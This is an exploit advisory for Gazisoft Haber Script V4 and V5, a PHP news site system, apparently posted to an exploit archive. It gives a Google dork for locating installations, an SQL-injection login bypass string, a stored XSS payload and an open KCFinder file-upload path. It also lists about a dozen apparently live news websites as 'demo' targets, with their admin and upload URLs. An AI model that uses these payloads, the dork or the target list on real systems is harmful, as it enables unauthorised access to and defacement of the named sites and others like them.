######################
# Exploit Title :  Gazisoft Haber Script V5 - Multiple Vulnerabilities
# Exploit Author : Persian Hack Team
# Vendor Homepage :  https://www.gazisoft.com/php-haber-yazilimi.html
# Google Dork : intext:" Sistem : Gazisoft" inurl:kunye.html
# Date: 2016/03/14
# Version : V4 , V5
######################
# PoC:
# 1-Admin Bypass
# Username : '=' 'or'
# Password : '=' 'or'
# Demo: 
# http://www.guncelegitim.com/admin/
# http://www.perrehaberajansi.com/admin
# http://www.hizlihaber.com/admin
# http://www.sadecemagazin.com/admin
# http://www.akyolhaber.com/admin
#
# 2-XSS
# Login and go to >> Genel Ayarlarnz >> Site Meta HTML >>
# Payload : <script>alert("D:");</script>
#
# 3-KCFinder Upload
# Demo : 
# http://www.fethiyedenhaber.com/admin/kcfinder/browse.php
# http://www.kurtalanhaberleri.com/admin/kcfinder/browse.php
# http://www.yanki24.com/admin/kcfinder/browse.php
# http://www.eymirmedya.com/admin/kcfinder/browse.php
# http://www.atlatmahaber.com/admin/kcfinder/browse.php
# http://www.gruevo.com/admin/kcfinder/browse.php
######################
# Discovered by :
# Mojtaba MobhaM ([email protected])
# T3NZOG4N ([email protected])
# Homepage : persian-team.ir
###################### 

# siph0n [2016-03-21]